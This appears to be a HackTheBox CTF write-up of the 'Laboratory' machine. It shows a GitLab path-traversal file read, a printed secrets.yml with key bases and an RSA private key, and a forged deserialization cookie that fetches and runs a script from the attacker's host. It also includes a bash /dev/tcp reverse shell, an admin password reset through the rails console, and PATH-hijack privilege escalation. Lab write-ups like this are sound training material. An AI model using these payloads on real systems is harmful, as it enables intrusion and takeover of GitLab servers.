Posts Hackthebox Laboratory writeup
Post
Cancel

Hackthebox Laboratory writeup

Introduction@Laboratory:~$

Column Details
Name Laboratory
IP 10.10.10.216
Points 20
Os Linux
Difficulty Easy
Creator 0xc45
Out On 14 Nov 2020

Summary

i got from the DNS of ssl certificate , Gitlab is hosted on the new vhost.The Current version of the gitlab-ce is vulnerable to LFI and RCE exploiting the RCE and getting initial shell in a docker , Reset the Password of admin account with github-rails console and login as him on gitlab.GOt the private ssh keys in a project-repo , Login as dexter and got a suid called docker-security , Analyzing the main function of te binary with radare2 , Its running chmod without the full path. Did Path-Hijacking to get root.

Pwned

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

┌─[root@d3dsec]─[~/Desktop/HTB/Laboratory]
└──╼ #cat nmap/result.nmap 
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.216
Nmap scan report for 10.10.10.216
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn: 
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds
                                                                

So basically Three ports are opened 22:ssh 80:http 443:https

Before further going we find some sub-domain in nmap result let's add it first.

nmap

cmd

Port-80

There is a simple Wepsite Template.

Port-80

But interesting part is there is some users

Port-80

git.laboratory.htb

In git.laboratory.htb there is gitlab running on the server.

git-laboratory-htb

Let's register ourself.

web

they show me a error. after further hit and try i find the way to register ourself with dedsec@laboratory.htb.

web

I got successfully login in.

web

I find some more users in issues page.

web

I run gobuster but nothing interesting found. i go to help page now.

web

I found gitlab version. let's search on google if we find some cve or anything.

web

Link : Arbitrary file read via the Uploads Rewriter when moving an issue

I found interesting gitlab issue about LFI & RCE.

They write all the step one by one in his article and also give us a practicle vedio.

gitlab

Step 1

Create a repo called 1st_project or anything you want to call.

gitlab

Step 2

Create another repo called 2st_project.

gitlab

gitlab

gitlab

Step 3

Go to the issues page.

gitlab

now click on new issue.

gitlab

type the name of the issue is issue or as your wish and description is and then submit the issue.

1

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
                                                                

gitlab

now click on move issue and click on 1st_project and click move.

gitlab

gitlab

Now you got the file download it and you got /etc/passwd file of the machiene.

gitlab

gitlab

subl

After further reading the article of gitlab i found that we need secrets.yml file to connect with the server.

gitlab

So for this process we need to create a local gitlab server and i use docker to install a gitlab server.

But first we need to dump the secrets.yml file from the server.

I use the same process but only change the payload to get secrets.yml file.

1

![a](/uploads/11111111111111111111111111111111/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)
                                                                

gitlab

And we got the secrets.yml file.

gitlab

Let's download it and check the content in that.

We only need secret_key_base.

subl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

# This file is managed by gitlab-ctl. Manual changes will be
# erased! To change the contents below, edit /etc/gitlab/gitlab.rb
# and run `sudo gitlab-ctl reconfigure`.
    
---
production:
db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838
secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af
openid_connect_signing_key: |
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
                                                                

Now we all set let's resume our docker process.

Let's first install the gitlab in docker.

1

sudo docker pull gitlab/gitlab-ee:12.8.1-ee.0
                                                                

cmd

After installing the gitlab let's go inside docker gitlab image.

1

docker run -it gitlab/gitlab-ee:12.8.1-ee.0 sh
                                                                

cmd

Then execute this:

1

/opt/gitlab/embedded/bin/runsvdir-start &
                                                                

You might get few errors but just ignore it

Now let's reconfigure the gitlab:

1

gitlab-ctl reconfigure
                                                                

cmd

After reconfigure the gitlab now we need to change one file called secrets.yml.

1

nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
                                                                

Just edit the secret_key_base line with original one which we dump from the server.

Important : you need to edit only 1 line called secret_key_base with the origianl one.

cmd

After edit the file run the command called:

1

gitlab-rails console
                                                                

After that copy the whole command and paste it in the gitlab-rails console.

1
2
3
4
5
6
7

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `curl 10.10.14.68/dedsec.sh -o /tmp/dedsec.sh && chmod 777 /tmp/dedsec.sh && bash /tmp/dedsec.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
                                                                

cmd

After pasting the whole command you got the cookie.

cmd

After that open a new terminal and create a file called dedsec.sh and add the following content and save the file.

1
2

#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.XX/9001 0>&1
                                                                

After that open a python3 server and netcat listner.

1

python3 -m http.server 80
                                                                
1

nc -nvlp 9001
                                                                

Now after everthing set we need to do a curl req to the server to get a reverse shell.

In the experimentation_subject_id= paste your cookie which we generate in gitlab-rails console.

1

curl -k -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiAZwjY29kaW5nOlVURi04Cl9lcmJvdXQgPSArJyc7IF9lcmJvdXQuPDwoKCBgY3VybCAxMC4xMC4xNC42OC9kZWRzZWMuc2ggLW8gL3RtcC9kZWRzZWMuc2ggJiYgY2htb2QgNzc3IC90bXAvZGVkc2VjLnNoICYmIGJhc2ggL3RtcC9kZWRzZWMuc2hgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--2e5cdf517c1458398368af1d8c97be6b4708bba0"
                                                                

cmd

Boom we got the reverse shell

So in the server gitlab is install so we can use the gitlab-rails console to change the password of admin user.

But first run the following command:

1
2

python3 -c 'import pty; pty.spawn("/bin/sh")'
gitlab-rails console
                                                                

cmd

How to reset your root password

I found an interesting article for how to reset the password in gitlab-rails console.

With the help of the article let's change the password of dexter because we see in the laboratory.htb that dexter user is a CEO so his account is interesting to work with.

And we also cross-check who is admin in the gitlab with this comand:

1

u = User.where(id:1).first
                                                                

cmd

And we see dexter is the admin of the gitlab.

Now let's reset the password of the dexter.

Run the following command one by one:

1
2
3
4

u.password = 'dedsec@12345'
u.password_confirmation = 'dedsec@12345'
u.save!
exit
                                                                

cmd

Now let's go to site and login with dexter.

user = dexter
password = dedsec@12345

web

And we got login.

web

go to second repo because he say personal stuff inside it.

web

Let's go to dexter -> .ssh -> id_rsa

web

web

web

web

And we got the dexter id_rsa let's ssh in real quick.

cmd

Privilege escalation

Let's run the LinEnum.

LinPEAS - Linux Privilege Escalation Awesome Script

cmd

Found interesting file in LinEnum result.

cmd

Let's go to that location check what file is this.

cmd

The file is SUID bit set file. let's check the content in that

cmd

It's use chmod to something but now clear what this file do.

so i ran pspy and then run this binary and i saw some process running after running the docker-security

1
2
3
4

2020/11/17 07:10:34 CMD: UID=0    PID=77936  | /usr/local/bin/docker-security
2020/11/17 07:10:34 CMD: UID=0    PID=77938  | sh -c chmod 700 /usr/bin/docker
2020/11/17 07:10:34 CMD: UID=0    PID=77939  | sh -c chmod 660 /var/run/docker.sock
2020/11/17 07:10:34 CMD: UID=0    PID=77940  | sh -c chmod 660 /var/run/docker.sock
                                                                

It's using chmod without specify the full path /usr/bin/chmod

So This is exploited by Path-Hijacking.

If you don't known about Path-Hijacking read this article.

Linux Privilege Escalation Using PATH Variable

So let's use Path-Hijacking for Privilege escalation

We need to create a file called chmod and add the bash reverse shell in it and play with PATH veriable.

1
2
3
4

cd /tmp
nano chmod
chmod +x ./chmod
PATH=$(pwd):$PATH docker-security
                                                                

cmd

And we pwned it …….

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

Topic Url
reset your root password https://docs.gitlab.com/12.10/ee/security/reset_root_password.html
Linux Privilege Escalation Using PATH Variable https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
LinPEAS https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
This post is licensed under CC BY 4.0

Hackthebox Jewel writeup

Fortress Reel2 writeup

© 2020 Dedinfosec . All rights reserved.